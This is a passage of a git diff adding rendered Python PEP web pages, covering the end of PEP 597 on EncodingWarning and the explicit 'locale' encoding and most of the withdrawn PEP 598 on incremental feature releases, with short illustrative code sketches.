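+proc = subprocess.run(["hostname"], capture_output=True, encoding="locale")
+
+# Tests reading known-ASCII fixtures can be explicit instead:
+with open("fixture.txt", "w", encoding="ascii") as f:
+    f.write("ok\n")
+with open("fixture.txt", encoding="ascii") as f:
+    assert f.read() == "ok\n"
+
+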
+
+
+

Rationale

+
+

Opt-in warning

+

Although DeprecationWarning is suppressed by default, always +emitting DeprecationWarning when the encoding argument is +omitted would be too noisy.

+

Noisy warnings may lead developers to dismiss the +DeprecationWarning.

+
+
+

“locale” is not a codec alias

+

We don’t add “locale” as a codec alias because the locale can be +changed at runtime.

+

Additionally, TextIOWrapper checks os.device_encoding() +when encoding=None. This behavior cannot be implemented in +a codec.

+
+
+
+

Backward Compatibility

+

The new warning is not emitted by default, so this PEP is 100% +backwards-compatible.

+
+
+

Forward Compatibility

+

Passing "locale" as the argument to encoding is not +forward-compatible. Code using it will not work on Python older than +3.10, and will instead raise LookupError: unknown encoding: locale.

+

Until developers can drop Python 3.9 support, EncodingWarning +can only be used for finding missing encoding="utf-8" arguments.

+
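
A common workaround until then is a small version gate; a sketch (the constant name is ours, not the PEP's, and the file name is illustrative):

+
import sys
+
+# encoding=None already means "use the locale encoding" on 3.9 and
+# earlier, so this gate is behaviour-preserving across versions:
+LOCALE_ENCODING = "locale" if sys.version_info >= (3, 10) else None
+
+with open("data.csv", encoding=LOCALE_ENCODING) as f:
+    contents = f.read()
+
+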
+
+

How to Teach This

+
+

For new users

+

Since EncodingWarning is used to write cross-platform code, +there is no need to teach it to new users.

+

We can just recommend using UTF-8 for text files and using +encoding="utf-8" when opening them.

+
+
+

For experienced users

+

Using open(filename) to read text files encoded in UTF-8 is a +common mistake. It may not work on Windows because UTF-8 is not the +default encoding.

+

You can use -X warn_default_encoding or +PYTHONWARNDEFAULTENCODING=1 to find this type of mistake.

+

Omitting the encoding argument is not a bug when opening text files +encoded in the locale encoding, but encoding="locale" is recommended +in Python 3.10 and later because it is more explicit.

+
+
+
+

Reference Implementation

+

https://github.com/python/cpython/pull/19481

+
+
+

Discussions

+

The latest discussion thread is: +https://mail.python.org/archives/list/python-dev@python.org/thread/SFYUP2TWD5JZ5KDLVSTZ44GWKVY4YNCV/

+
    +
  • Why not implement this in linters?
      +
    • encoding="locale" and io.text_encoding() must be implemented +in Python.
    • +
    • It is difficult to find all callers of functions wrapping +open() or TextIOWrapper() (see the io.text_encoding() +section).
    • +
    +
  • +
  • Many developers will not use the option.
      +
    • Some will, and report the warnings to libraries they use, +so the option is worth it even if many developers don’t enable it.
    • +
    • For example, I found [7] and [8] by running +pip install -U pip, and [9] by running tox +with the reference implementation. This demonstrates how this +option can be used to find potential issues.
    • +
    +
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0597.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file
diff --git a/pep-0598/index.html b/pep-0598/index.html new file mode 100644 index 00000000000..8f574a5f512 --- /dev/null +++ b/pep-0598/index.html @@ -0,0 +1,967 @@
+ PEP 598 – Introducing incremental feature releases | peps.python.org
+
+
+

+
+
+

PEP 598 – Introducing incremental feature releases

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Created:
+
15-Jun-2019
+
Python-Version:
+
3.9
+
+
+
+
+
+

Abstract

+

PEP 602 proposes reducing the feature delivery latency for the Python +standard library and CPython reference interpreter by increasing the frequency +of CPython feature releases from every 18-24 months to instead occur every 9-12 +months.

+

This PEP proposes to instead reduce the frequency of new baseline feature +releases (with the associated filesystem layout changes, bytecode format +changes, and C ABI compatibility breaks) to occur only every other year (2020, +2022, 2024, etc), but to combine that change with a new policy and approach that +allows the introduction of backwards compatible features in the initial set of +point releases within a given release series.

+
+
+

PEP Withdrawal

+

This PEP has been withdrawn in favour of the rolling beta release stream +proposal in PEP 605.

+

However, the concerns raised in this PEP are likely to apply to any other +“Long Term Support branch” proposals that allow feature backports to improve +the developer experience of supporting such releases (such as the EL Python +draft at [3]), so the ideas presented here may provide useful design +suggestions for such proposals.

+
+
+

Summary

+

The proposal to keep the current CPython release compatibility management process, but go through it more often, has significant practical downsides, as a CPython feature release carries certain expectations (most notably: a 5-year maintenance lifecycle, support for parallel installation with the previous feature release, and the possibility of breaking changes to the CPython-specific ABI, requiring recompilation of all extension modules). These expectations mean that faster feature releases in their current form have the potential to significantly increase the burden of maintaining 3rd party Python libraries and applications across all actively supported CPython releases.

+

It’s also arguable whether such an approach would noticeably reduce the typical +feature delivery latency in practice for most end users, as the adoption cycle +for new feature releases is typically measured in months or years, so more +frequent releases may just lead to end users updating to every 3rd or 4th +feature release, rather than every 2nd or 3rd feature release (as often happens +today).

+

This PEP presents a competing proposal to instead slow down the frequency of +parallel installable feature releases that change the filesystem layout +and CPython ABI to a consistent 24-month cycle, but to compensate for this by +introducing the notion of build compatible incremental feature releases, and +then deferring the full feature freeze of a given feature release series from +the initial baseline X.Y.0 release to a subsequent X.Y.Z feature complete +release that occurs ~12 months after the initial baseline feature release.

+

A new feature_complete attribute on the sys.version_info structure will +provide a programmatic indicator as to whether or not a release series remains +open to further incremental feature releases. Alternate implementations of +Python would also be free to clear this flag to indicate that their support for +their nominal Python version may still be a work in progress.

+

For compatibility testing purposes, and to maintain pickle compatibility in +mixed version environments, a new sys.feature_limit attribute (and +corresponding CPython CLI parameter, --feature-limit X.Y.Z, and environment +variable, PYTHONFEATURELIMIT) will provide a way to limit the runtime +availability of features added in incremental feature releases.

+
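
Since neither attribute was ever implemented, existing interpreters can only be probed defensively; a speculative sketch of how code might have consumed the proposed attributes:

+
import sys
+
+# feature_complete and sys.feature_limit are proposals from this
+# (withdrawn) PEP; fall back to today's semantics when absent.
+complete = getattr(sys.version_info, "feature_complete", True)
+limit = getattr(sys, "feature_limit", tuple(sys.version_info[:3]))
+
+print("series feature complete:", complete)
+print("feature limit:", limit)
+
+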

The existing cycle and the new cycle would be synchronised on their feature +freeze release dates, so the full Python 3.9.x feature freeze would occur in +October 2021, 24 months after the Python 3.8.0 feature release, with the initial +Python 3.9.0 release taking place in October 2020.

+
+
+

Example Future Release Schedules

+

Under this proposal, Python 3.9.0a1 would be released in November 2019, shortly +after the Python 3.8.0 feature complete release in October 2019.

+

The 3.9.0b1 release would then follow 6 months later in May 2020, with 3.9.0 +itself being released in October 2020.

+

Assuming micro releases of 3.9.x were to occur quarterly, then the overall +release timeline would look like:

+
    +
  • 2019-11: 3.9.0a1
  • +
  • … additional alpha releases as determined by the release manager
  • +
  • 2020-05: 3.9.0b1
  • +
  • … additional beta releases as determined by the release manager
  • +
  • 2020-08: 3.9.0bX (final beta release that locks ABI compatibility)
  • +
  • 2020-09: 3.9.0rc1
  • +
  • … additional release candidates as determined by the release manager
  • +
  • 2020-10: 3.9.0 (BFR - baseline feature release)
  • +
  • 2021-01: 3.9.1 (IFR - incremental feature release)
  • +
  • 2021-04: 3.9.2 (IFR)
  • +
  • 2021-07: 3.9.3 (IFR)
  • +
  • 2021-10: 3.9.4 (feature complete release)
  • +
  • 2022-01: 3.9.5
  • +
  • 2022-04: 3.9.6
  • +
  • 2022-07: 3.9.7
  • +
  • 2022-10: 3.9.8 (final regular maintenance release)
  • +
  • … additional security fix only releases as needed
  • +
  • 2025-10: 3.9.x branch closed
  • +
+

Feature complete release numbers would typically be written without any +qualifier (as they are today), while the baseline and incremental feature +releases would be expected to have a qualifier appended indicating that they +aren’t a traditional CPython release (3.9.0 (BFR), 3.9.1 (IFR), etc).

+

The Python 3.10 release series would start being published the month after the +first Python 3.9 feature complete release, in parallel with the final 12 months +of routine Python 3.9 maintenance releases:

+
    +
  • 2021-11: 3.10.0a1
  • +
  • … additional alpha releases as determined by the release manager
  • +
  • 2022-05: 3.10.0b1
  • +
  • … additional beta releases as determined by the release manager
  • +
  • 2022-08: 3.10.0bX (final beta release that locks ABI compatibility)
  • +
  • 2022-09: 3.10.0rc1
  • +
  • … additional release candidates as determined by the release manager
  • +
  • 2022-10: 3.10.0 (BFR)
  • +
  • 2023-01: 3.10.1 (IFR)
  • +
  • 2023-04: 3.10.2 (IFR)
  • +
  • 2023-07: 3.10.3 (IFR)
  • +
  • 2023-10: 3.10.4
  • +
  • 2024-01: 3.10.5
  • +
  • 2024-04: 3.10.6
  • +
  • 2024-07: 3.10.7
  • +
  • 2024-10: 3.10.8 (final regular maintenance release)
  • +
  • … additional security fix only releases as needed
  • +
  • 2027-10: 3.10.x branch closed
  • +
+

In this model, there are always two or three active branches:

+
    +
  • 2019-04 -> 2019-10: 3.9.0 pre-alpha, 3.8.0 pre-release, 3.7.x maintenance
  • +
  • 2019-10 -> 2020-05: 3.9.0 pre-beta, 3.8.x maintenance
  • +
  • 2020-05 -> 2020-10: 3.10.0 pre-alpha, 3.9.0 pre-release, 3.8.x maintenance
  • +
  • 2020-10 -> 2021-10: 3.10.0 pre-alpha, 3.9.x feature releases, 3.8.x maintenance
  • +
  • 2021-10 -> 2022-05: 3.10.0 pre-beta, 3.9.x maintenance
  • +
  • 2022-05 -> 2022-10: 3.11.0 pre-alpha, 3.10.0 pre-release, 3.9.x maintenance
  • +
  • 2022-10 -> 2023-10: 3.11.0 pre-alpha, 3.10.x feature releases, 3.9.x maintenance
  • +
  • 2023-10 -> 2024-05: 3.11.0 pre-beta, 3.10.x maintenance
  • +
  • 2024-05 -> 2024-10: 3.12.0 pre-alpha, 3.11.0 pre-release, 3.10.x maintenance
  • +
  • … etc
  • +
+

(Pre-alpha and pre-beta development occurs on the main git branch; all other development occurs on a release-specific branch, with changes typically backported from the main git branch)

+

TODO: this really needs a diagram to help explain it, so I’ll add a picture +once I have one to add.

+

This is quite similar to the status quo, but with a more consistent cadence, +alternating between baseline feature release years (2020, 2022, etc) that focus +on the alpha and beta cycle for a new baseline feature release (while continuing +to publish maintenance releases for the previous feature release series), and +feature complete release years (2021, 2023, etc), that focus on making +smaller improvements to the current feature release series (while making plans +for the next feature release series the following year).

+
+
+

Proposal

+

Excluding alpha and beta releases, CPython currently has 3 different kinds +of release increment:

+
    +
  • Feature release (i.e. X.Y.0 releases)
  • +
  • Maintenance release (X.Y.Z releases within ~2 years of X.Y.0)
  • +
  • Source-only security release (subsequent X.Y.Z releases)
  • +
+

Feature freeze takes place at the time of the X.Y.0b1 release. +Build compatibility freeze now takes place at the time of the last beta release +(providing time for projects to upload wheel archives to PyPI prior to the +first release candidate).

+

This then creates the following periods in the lifecycle of a release series:

+
    +
  • Pre-beta (release series is the CPython development branch)
  • +
  • Beta (release enters maintenance mode, ABI compatibility mostly locked)
  • +
  • Maintenance (ABI locked, only bug fixes & docs enhancements accepted)
  • +
  • Security fix only (no further binary releases, only security fixes accepted)
  • +
  • End of life (no further releases of any kind)
  • +
+

The proposal in this PEP is that the “Feature release” category be split up into +three different kinds of feature release:

+
    +
  • Baseline feature release (X.Y.0 releases)
  • +
  • Incremental feature release (any X.Y.Z releases published between a +baseline feature release and the corresponding feature complete release)
  • +
  • Feature complete release (a specific X.Y.Z release ~1 year after X.Y.0)
  • +
  • Maintenance release (X.Y.Z releases within ~1 year of the feature complete release)
  • +
  • Source-only security release (subsequent X.Y.Z releases)
  • +
+

This would then introduce a new “Feature releases” phase in the release series +lifecycle:

+
    +
  • Pre-beta (release series is the CPython development branch)
  • +
  • Beta (release enters feature additions mode, ABI compatibility not yet locked)
  • +
  • Feature releases (ABI locked, backwards compatible API additions accepted)
  • +
  • Maintenance (ABI locked, only bug fixes & docs enhancements accepted)
  • +
  • Security fix only (no further binary releases, only security fixes accepted)
  • +
  • End of life (no further releases of any kind)
  • +
+

The pre-release beta period would be relaxed to use the incremental feature +release policy for changes, rather than the stricter maintenance release policy.

+

For governance purposes, baseline feature releases are the only releases that +would qualify as a “feature release” in the PEP 13 sense (incremental feature +releases wouldn’t count).

+
+

Baseline feature releases and feature release series

+

Baseline feature releases are essentially just the existing feature releases, +given a new name to help distinguish them from the new incremental feature +releases, and also to help indicate that unlike their predecessors, they are +no longer considered feature complete at release.

+

Baseline feature releases would continue to define a new feature release series, +locking in the following language, build, and installation compatibility +constraints for the remainder of that series:

+
    +
  • Python language grammar
  • +
  • ast module AST format
  • +
  • CPython interpreter opcode format
  • +
  • pyc file magic number and filename compatibility tags
  • +
  • extension module filename compatibility tags
  • +
  • wheel archive compatibility tags
  • +
  • default package and module import directories
  • +
  • default installation filename and directories
  • +
+

Baseline feature releases would also continue to be the only releases where:

+
    +
  • new deprecations, pending deprecations, and other warnings can be introduced
  • +
  • existing pending deprecations can be converted to full deprecations
  • +
  • existing warnings can be converted to errors
  • +
  • other changes requiring “Porting to Python X.Y” entries in the What’s New +document can be introduced
  • +
+

Key characteristics of a feature release series:

+
    +
  • an installation within one feature release series does not conflict with +installations of other feature release series (i.e. they can be installed in parallel)
  • +
  • an installation within a feature release series can be updated to a later +micro release within the same series without requiring reinstallation +or any other changes to previously installed components
  • +
+

Key characteristics of a baseline feature release:

+
    +
  • in a baseline feature release, sys.version_info.feature_complete == False
  • +
  • in a baseline feature release, sys.version_info.micro == 0
  • +
  • baseline feature releases may contain higher risk changes to the language and +interpreter, such as grammar modifications, major refactoring of interpreter +and standard library internals, or potentially invasive feature additions that +carry a risk of unintended side effects on other existing functionality
  • +
  • features introduced in a baseline feature release are the only features +permitted to rely on sys.version_info as their sole runtime indicator +of the feature’s availability
  • +
+

Key expectations around feature release series and baseline feature releases:

+
    +
  • most public projects will only actively test against the most recent +micro release within a release series
  • +
  • many (most?) public projects will only add a new release series to their test +matrix after the initial baseline feature release has already been published, +which can make it difficult to resolve issues that require providing new flags +or APIs to explicitly opt-in to old behaviour after a default behaviour changed
  • +
  • private projects with known target environments will test against whichever +micro release version they’re actually using
  • +
  • most private projects will also only consider migrating to a new release +series after the initial baseline feature release has already been published, +again posing a problem if the resolution of their problems requires an API +addition
  • +
+

The key motivation of the proposal in this PEP is that the public and private +project behaviours described above aren’t new expectations: they’re +descriptions of the way CPython release series are already handled by the wider +community today. As such, the PEP represents an attempt to adjust our release +policies and processes to better match the way the wider community already +handles them, rather than changing our processes in a way that then means the +wider community needs to adjust to us rather than the other way around.

+
+
+

Incremental feature releases

+

Incremental feature releases are the key new process addition being proposed by +this PEP. They are subject to the same strict runtime compatibility requirements +as the existing maintenance releases, but would have the following more +relaxed policies around API additions and enhancements:

+
    +
  • new public APIs can be added to any standard library module (including builtins)
  • +
  • subject to the feature detection requirement below, new optional arguments can +be added to existing APIs (including builtins)
  • +
  • new public APIs can be added to the stable C ABI (with appropriate version guards)
  • +
  • new public APIs can be added to the CPython C API
  • +
  • with the approval of the release manager, backwards compatible reliability +improvements can be made to existing APIs and syntactic constructs
  • +
  • with the approval of the release manager, performance improvements can be +incorporated for existing APIs and syntactic constructs
  • +
+

The intent of this change in policy is to allow usability improvements for new +(and existing!) language features to be delivered in a more timely fashion, +rather than requiring users to incur the inherent delay and costs of waiting for +and then upgrading to the next feature release series.

+

It is also designed such that the approval to add a feature to the next baseline +feature release can be considered separately from the question of whether or not +to make it available in the next incremental feature release for the current +release series, potentially allowing the first task to be completed by volunteer +contributors, while the latter activity could be handled by paid contributors +(e.g. customers of commercial Python redistributors could potentially request +that their vendor backport a feature, or core developers could offer to +undertake specific backports on a contract basis). (There would be potential +ethical concerns with gating bug fixes this way, but those concerns don’t apply +for backports of new features)

+

Key characteristics of an incremental feature release:

+
    +
  • in an incremental feature release, sys.version_info.feature_complete == False
  • +
  • in an incremental feature release, sys.version_info.micro != 0
  • +
  • all API additions made in an incremental feature release must support efficient runtime feature detection that doesn’t rely on either sys.version_info or runtime code object introspection. In most cases, a simple hasattr check on the affected module will serve this purpose, but when it doesn’t, an alternative approach will need to be implemented as part of the feature addition (see the sketch after this list). Prior art in this area includes the pickle.HIGHEST_PROTOCOL attribute, the hashlib.algorithms_available set, and the various os.supports_* sets that the os module already offers for platform dependent capability detection
  • +
  • to maintain pickle compatibility in mixed version environments, and to enable +easier compatibility testing across multiple API versions within the same +release series, all API additions made in an incremental feature release +must support the new sys.feature_limit setting as described in the next +section
  • +
+
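
A sketch of such feature detection using existing prior art (the hashlib APIs shown are real; the pattern, rather than these specific names, is what the requirement mandates):

+
import hashlib
+
+# Attribute probe: no reliance on sys.version_info.
+if hasattr(hashlib, "blake2b"):
+    digest = hashlib.blake2b(b"data").hexdigest()
+
+# Capability-set probe, mirroring hashlib.algorithms_available:
+if "sha3_256" in hashlib.algorithms_available:
+    digest = hashlib.new("sha3_256", b"data").hexdigest()
+
+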

Key expectations around incremental feature releases:

+
    +
  • “don’t break existing installations on upgrade” remains a key requirement +for all micro releases, even with the more permissive change inclusion policy
  • +
  • more intrusive changes should still be deferred to the next baseline feature +release
  • +
  • public Python projects that start relying on features added in an incremental +feature release should set their Python-Requires metadata appropriately +(projects already do this when necessary - e.g. aiohttp specifically +requires 3.5.3 or later due to an issue with asyncio.get_event_loop() +in earlier versions)
  • +
+

Some standard library modules may also impose their own restrictions on +acceptable changes in incremental feature releases (for example, only a +baseline feature release should ever add new hash algorithms to +hashlib.algorithms_guaranteed - incremental feature releases would only be +permitted to add algorithms to hashlib.algorithms_available)

+
+
+

Maintaining interoperability across incremental feature releases

+

It is a common practice to use Python’s pickle module to exchange +information between Python processes running on different versions of Python. +Between release series, this compatibility is expected to only run one way +(i.e. excluding deprecated APIs, Python “X.Y+1” processes should be able to +read pickle archives produced by Python “X.Y” processes, but the reverse does +not hold, as the newer archives may reference attributes and parameters that +don’t exist in the older version).

+

Within a release series, however, it is expected to hold in both directions, +as the “No new features” policy means that almost all pickle archives created +on Python “X.Y.Z+1” will be readable by Python “X.Y.Z” processes.

+

Similarly, Python libraries and applications are often only tested against +the latest version in a release series, and this is usually sufficient to keep +code working on earlier releases in that same series.

+

Allowing feature additions in later “X.Y.Z” releases with no way to turn them +off would pose a problem for these common practices, as a library or application +that works fine when tested on CPython version “X.Y.Z” would fail on earlier +versions if it used a feature newly introduced in “X.Y.Z”, and any pickle +archives it creates that rely on those new interfaces may also not be readable +on the older versions.

+

To help address these problems, a new sys.feature_limit attribute would be +added, as a structured sequence corresponding to the first 3 fields in +sys.version_info (major, minor, micro).

+

A new CLI option (--feature-limit X.Y.Z) and environment variable +(PYTHONFEATURELIMIT=X.Y.Z) would be used to set this attribute. The +PyCoreConfig struct would also gain a new field:

+
wchar_t *feature_limit;
+
+
+

If the limit is not set explicitly, it would default to the first 3 fields in +sys.version_info. If the limit is set to a value outside the lower bound of +sys.version_info[:2] and the upper bound of sys.version_info[:3], it +will be clamped to those bounds, padding with zeroes if necessary.

+

For example, given a current version of “3.9.3”, nominal limits would be +converted to runtime sys.feature_limit values as follows:

+
3 => (3, 9, 0)
+3.8.1 => (3, 9, 0)
+3.9 => (3, 9, 0)
+3.9.2 => (3, 9, 2)
+<unset> => (3, 9, 3)
+3.9.3 => (3, 9, 3)
+3.9.4 => (3, 9, 3)
+4 => (3, 9, 3)
+
+
+
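
The clamping rules above are mechanical enough to express directly; a speculative sketch (the helper is ours; nothing like it was ever added to CPython):

+
def clamp_feature_limit(nominal, version):
+    """Clamp a nominal (possibly short) limit tuple to the proposed
+    bounds: version[:2] + (0,) below, version[:3] above."""
+    nominal = (tuple(nominal) + (0, 0, 0))[:3]
+    return max(version[:2] + (0,), min(nominal, version))
+
+# Reproduces the (3, 9, 3) examples above:
+assert clamp_feature_limit((3,), (3, 9, 3)) == (3, 9, 0)
+assert clamp_feature_limit((3, 8, 1), (3, 9, 3)) == (3, 9, 0)
+assert clamp_feature_limit((3, 9, 2), (3, 9, 3)) == (3, 9, 2)
+assert clamp_feature_limit((3, 9, 4), (3, 9, 3)) == (3, 9, 3)
+assert clamp_feature_limit((4,), (3, 9, 3)) == (3, 9, 3)
+
+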

New APIs backported to an incremental feature release would be expected to +include a guard that deletes the API from the module if the feature limit is +too low:

+
def feature_api():
+    ...
+
+_version_feature_api_added = (3, 9, 1)
+if _version_feature_api_added > sys.feature_limit:
+    del feature_api
+
+
+

Similarly, new parameters would be expected to include a guard that adjusts the +function signature to match the old one:

+
def feature_api(old_param1, old_param2, new_param=default):
+    """Updated API docstring"""
+    ...
+
+_version_feature_api_changed = (3, 9, 1)
+if _version_feature_api_changed > sys.feature_limit:
+    _new_feature_api = feature_api
+    def feature_api(old_param1, old_param2):
+        """Legacy API docstring"""
+        return _new_feature_api(old_param1, old_param2)
+
+
+

Structuring the guards this way would keep the code structure as similar as +possible between the main development branch and the backport branches, so +future bug fixes can still be backported automatically.

+

It is expected that convenience functions and/or additional automated tests +would eventually be added to help ensure these backported APIs are guarded +appropriately, but it seems reasonable to wait until specific concrete +examples are available to drive the design of those APIs and automated tests, +rather than designing them solely on the basis of hypothetical examples.

+
+
+

Feature complete release and subsequent maintenance releases

+

The feature complete release for a given feature release series would be +developed under the normal policy for an incremental feature release, but +would have one distinguishing feature:

+
    +
  • in a feature complete release, sys.version_info.feature_complete == True
  • +
+

Any subsequent maintenance and security fix only releases would also have that +flag set, and may informally be referred to as “feature complete releases”. +For release series definition purposes though, the feature complete release +is the first one that sets that flag to “True”.

+
+
+

Proposed policy adjustment for provisional APIs

+

To help improve consistency in management of provisional APIs, this PEP proposes +that provisional APIs be subject to regular backwards compatibility requirements +following the feature complete release for a given release series.

+

Other aspects of managing provisional APIs would remain as they are today, so as +long as an API remains in the provisional state, regular backwards compatibility +requirements would not apply to that API in baseline and incremental feature +releases.

+

This policy is expected to provide increased clarity to end users (as even +provisional APIs will become stable for that release series in the feature +complete release), with minimal practical downsides for standard library +maintainers, based on the following analysis of documented API additions and +changes in micro releases of CPython since 3.0.0:

+
    +
  • 21 3.x.1 version added/changed notes
  • +
  • 30 3.x.2 version added/changed notes
  • +
  • 18 3.x.3 version added/changed notes
  • +
  • 11 3.x.4 version added/changed notes
  • +
  • 1 3.x.5 version added/changed notes
  • +
  • 0 3.x.6+ version added/changed notes
  • +
+

When post-baseline-release changes need to be made, the majority of them occur +within the first two maintenance releases, which have always occurred within 12 +months of the baseline release.

+

(Note: these counts are not solely for provisional APIs - they cover all APIs +where semantic changes were made after the baseline release that were considered +necessary to cover in the documentation. To avoid double counting changes, the +numbers exclude any change markers from the What’s New section)

+
+
+
+

Motivation

+

The motivation for change in this PEP is essentially the same as the motivation +for change in PEP 596: the current 18-24 month gap between feature releases has +a lot of undesirable consequences, especially for the standard library (see +PEP 596 for further articulation of the details).

+

This PEP’s concern with the specific proposal in PEP 596 is that it doubles the +number of actively supported Python branches, increasing the complexity of +compatibility testing matrices for the entire Python community, increasing the +number of binary Python wheels to be uploaded to PyPI when not using the stable +ABI, and just generally having a high chance of inflicting a relatively high +level of additional cost across the entire Python ecosystem.

+

The view taken in this PEP is that there’s an alternative approach that provides +most of the benefits of a faster feature release without actually incurring the +associated costs: we can split the current X.Y.0 “feature freeze” into two +parts, such that the baseline X.Y.0 release only imposes a +“runtime compatibility freeze”, and the full standard library feature freeze +is deferred until later in the release series lifecycle.

+
+
+

Caveats and Limitations

+

This proposal does NOT retroactively apply to Python 3.8 - it is being proposed +for Python 3.9 and later releases only.

+

Actual release dates may be adjusted up to a month earlier or later at +the discretion of the release manager, based on release team availability, and +the timing of other events (e.g. PyCon US, or the annual core development +sprints). However, part of the goal of this proposal is to provide a consistent +annual cadence for both contributors and end users, so adjustments ideally would +be rare.

+

This PEP does not dictate a specific cadence for micro releases within a release +series - it just specifies the rough timelines for transitions between the +release series lifecycle phases (pre-alpha, alpha, beta, feature releases, +bug fixes, security fixes). The number of micro releases within each phase is +determined by the release manager for that series based on how frequently they +and the rest of the release team for that series are prepared to undertake the +associated work.

+

However, for the sake of the example timelines, the PEP assumes quarterly +micro releases (the cadence used for Python 3.6 and 3.7, splitting the +difference between the twice yearly cadence used for some historical release +series, and the monthly cadence planned for Python 3.8 and 3.9).

+
+
+

Design Discussion

+
+

Why this proposal over simply doing more frequent baseline feature releases?

+

The filesystem layout changes and other inherently incompatible changes involved +in a baseline feature release create additional work for large sections of the +wider Python community.

+

Decoupling those layout changes from the Python version numbering scheme is also +something that would in and of itself involve making backwards incompatible +changes, as well as adjusting community expectations around which versions will +install over the top of each other, and which can be installed in parallel on +a single system.

+

We also don’t have a straightforward means to communicate to the community +variations in support periods like “Only support Python version X.Y until +X.Y+1 is out, but support X.Z until X.Z+2 is out”.

+

So this PEP takes as its starting assumption that the vast majority of Python +users simply shouldn’t need to care that we’re changing our release policy, +and the only folks that should be affected are those that are eagerly waiting +for standard library improvements (and other backwards compatible interpreter +enhancements), and those that need to manage mission critical applications in +complex deployment environments.

+
+
+

Implications for Python library development

+

Many Python libraries (both open source and proprietary) currently adopt the +practice of testing solely against the latest micro release within each feature +release series that the project still supports.

+

The design assumption in this PEP is that this practice will continue to be +followed during the feature release phase of a release series, with the +expectation being that anyone choosing to adopt a new release series before it +is feature complete will closely track the incremental feature releases.

+

Libraries that support a previous feature release series are unlikely to adopt +features added in an incremental feature release, and if they do adopt such +a feature, then any associated fallback compatibility strategies should be +implemented in such a way that they’re also effective on the earlier releases +in that release series.

+
+
+

Implications for the proposed Scientific Python ecosystem support period

+

Based on discussions at SciPy 2019, a NEP is currently being drafted [2] to +define a common convention across the Scientific Python ecosystem for dropping +support for older Python versions.

+

While the exact formulation of that policy is still being discussed, the initial +proposal was very simple: support any Python feature release published within +the last 42 months.

+

For an 18-month feature release cadence, that works out to always supporting at +least the two most recent feature releases, and then dropping support for all +X.Y.z releases around 6 months after X.(Y+2).0 is released. This means there is +a 6-month period roughly every other year where the three most recent feature +releases are supported.

+

For a 12-month release cadence, it would work out to always supporting at +least the three most recent feature releases, and then dropping support for all +X.Y.z releases around 6 months after X.(Y+3).0 is released. This means that +for half of each year, the four most recent feature releases would be supported.

+

For a 24-month release cadence, a 42-month support cycle works out to always +supporting at least the most recent feature release, and then dropping support +for all X.Y.z feature releases around 18 months after X.(Y+1).0 is released. +This means there is a 6-month period every other year where only one feature +release is supported (and that period overlaps with the pre-release testing +period for the X.(Y+2).0 baseline feature release).

+

Importantly for the proposal in this PEP, that support period would abide by +the recommendation that library developers maintain support for the previous +release series until the latest release series has attained feature complete +status: dropping support 18 months after the baseline feature release will be +roughly equivalent to dropping support 6 months after the feature complete +release, without needing to track exactly which release marked the series as +feature complete.

+
+
+

Implications for simple deployment environments

+

For the purposes of this PEP, a “simple” deployment environment is any use case +where it is straightforward to ensure that all target environments are updated +to a new Python micro version at the same time (or at least in advance of the +rollout of new higher level application versions), and there isn’t any +requirement for older Python versions to be able to reliably read pickle streams +generated with the newer Python version, such that any pre-release testing that +occurs need only target a single Python micro version.

+

The simplest such case would be scripting for personal use, where the testing +and target environments are the exact same environment.

+

Similarly simple environments would be containerised web services, where the +same Python container is used in the CI pipeline as is used on deployment, and +any application that bundles its own Python runtime, rather than relying on a +pre-existing Python deployment on the target system.

+

For these use cases, this PEP shouldn’t have any significant implications - only +a single micro version needs to be tested, independently of whether that +version is feature complete or not.

+
+
+

Implications for complex deployment environments

+

For the purposes of this PEP, “complex” deployment environments are use cases +which don’t meet the “simple deployment” criterion above: new application +versions are combined with two or more distinct micro versions within +the same release series as part of the deployment process, rather than always +targeting exactly one micro version at a time.

+

If the proposal in this PEP has the desired effect of reducing feature delivery +latency, then it can be expected that developers using a release series that is +not yet feature complete will actually make use of the new features as they’re +made available. This then means that testing against a newer incremental feature +release becomes an even less valid test of compatibility with the baseline +feature release and older incremental feature releases than testing against a +newer maintenance release is for older maintenance releases.

+

One option for handling such cases is to simply prohibit the use of new Python +versions until the series has reached “feature complete” status. Such a policy +is effectively already adopted by many organisations when it comes to new +feature release series, with acceptance into operational environments occurring +months or years after the original release. If this policy is adopted, then such +organisations could potentially still adopt a new Python version every other +year - it would just be based on the availability of the feature complete +releases, rather than the baseline feature releases.

+

A less strict alternative to outright prohibition would be to make use of the +proposed PYTHONFEATURELIMIT setting to enable phased migrations to new +incremental feature releases:

+
    +
  • initially roll out Python X.Y.0 with PYTHONFEATURELIMIT=X.Y.0 set in CI +and on deployment
  • +
  • roll out Python X.Y.1 to CI, keeping the PYTHONFEATURELIMIT=X.Y.0 setting
  • +
  • deploy Python X.Y.1 to production based on successful CI results
  • +
  • update deployment environments to set PYTHONFEATURELIMIT=X.Y.1
  • +
  • set PYTHONFEATURELIMIT=X.Y.1 in CI only after all deployment environments +have been updated
  • +
  • repeat this process for each new release up to and including the feature +complete release for the release series
  • +
  • once the series is feature complete, either continue with this same process +for consistency’s sake, or else stop updating PYTHONFEATURELIMIT and leave +it at the feature complete version number
  • +
+
+
+

Duration of the feature additions period

+

This PEP proposes that feature additions be limited to 12 months after the +initial baseline feature release.

+

The primary motivation for that is specifically to sync up with the Ubuntu LTS +timing, such that the feature complete release for the Python 3.9.x series gets +published in October 2021, ready for inclusion in the Ubuntu 22.04 release. +(other LTS Linux distributions like RHEL, SLES, and Debian don’t have a fixed +publishing cadence, so they can more easily tweak their LTS timing a bit to +align with stable versions of their inputs. Canonical deliberately haven’t +given themselves that flexibility with their own release cycle).

+

The 12 month feature addition period then arises from splitting the time +from the 2019-10 release of Python 3.8.0 and a final Python 3.9.x incremental +feature release in 2021-10 evenly between pre-release development and subsequent +incremental feature releases.

+

This is an area where this PEP could adopt part of the proposal in PEP 596, +by instead making that split ~9 months of pre-release development, and ~15 +months of incremental feature releases:

+
    +
  • 2019-11: 3.9.0a1
  • +
  • … additional alpha releases as determined by the release manager
  • +
  • 2020-03: 3.9.0b1
  • +
  • 2020-04: 3.9.0b2
  • +
  • 2020-05: 3.9.0b3 (final beta release that locks ABI compatibility)
  • +
  • 2020-06: 3.9.0rc1
  • +
  • … additional release candidates as determined by the release manager
  • +
  • 2020-07: 3.9.0 (BFR)
  • +
